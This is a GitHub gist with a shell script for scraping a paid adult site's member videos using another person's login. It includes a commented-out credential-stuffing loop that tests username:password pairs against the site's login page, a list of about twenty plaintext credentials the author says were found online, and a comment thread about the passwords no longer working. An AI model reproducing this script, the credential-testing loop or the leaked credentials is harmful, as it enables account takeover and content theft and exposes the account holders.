Skip to content

Instantly share code, notes, and snippets.

@dardo82
Last active July 30, 2024 14:04
Show Gist options
  • Save dardo82/e95c445f1e951167e89eb78cba315a99 to your computer and use it in GitHub Desktop.
Save dardo82/e95c445f1e951167e89eb78cba315a99 to your computer and use it in GitHub Desktop.
Ewa Sonnet site DL
#!/bin/sh
# Download EwaSonnet's videos and photos.
# for i in $(cat cred.txt); do curl -L -s 3wasonnet.com/tour/do_member_login_acms4.php \
# -d "$(echo $i|sed -E 's/^| / username=/;s/:/\&pass=/')&btn=++Login++"; echo $i; done \
# | sed -n '/already/s/.*>//p'
for n in {1..24};do
curl -Lsu 'odinboy:thebobby' www.3wasonnet.com/members/latest-videos/page/$n/|tr\
'"' '\n'|egrep -i '^h.*rs/[[:alnum:]]+(-[[:alnum:]]*)+(-[[:digit:]])*$'|uniq -d
done
krimzon:pyro9875 haslo:prosiak karwen:hugoboss jsuglia:zzxxcc nerfo3:diplomat nhahsiew:grist789 pete1122:fooman11 realbook:proximus sirachim:Achim01 odinboy:thebobby shomina:minami3 zoulou:vision FRANCOIS:LOLOLO MasaSasa:3484masa Obauer:09051986 Boronion:boronion XXXLover:5136xxx bebiboi:vhkzkca7 bereksas:bultaco adidas:sourmash
@marcos0x
Copy link

Can you update? Not working

@dardo82
Copy link
Author

dardo82 commented Jul 22, 2024

Can you update? Not working

The password is wrong? 🤔

@marcos0x
Copy link

The password is wrong? 🤔

yes

@dardo82
Copy link
Author

dardo82 commented Jul 23, 2024

The password is wrong? 🤔

yes

Did you try the other ones? 🤔

@marcos0x
Copy link

yes, none of them work

@dardo82
Copy link
Author

dardo82 commented Jul 30, 2024

yes, none of them work

I've found them around the internet, maybe you can do the same, let me know if you have any success at all, thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment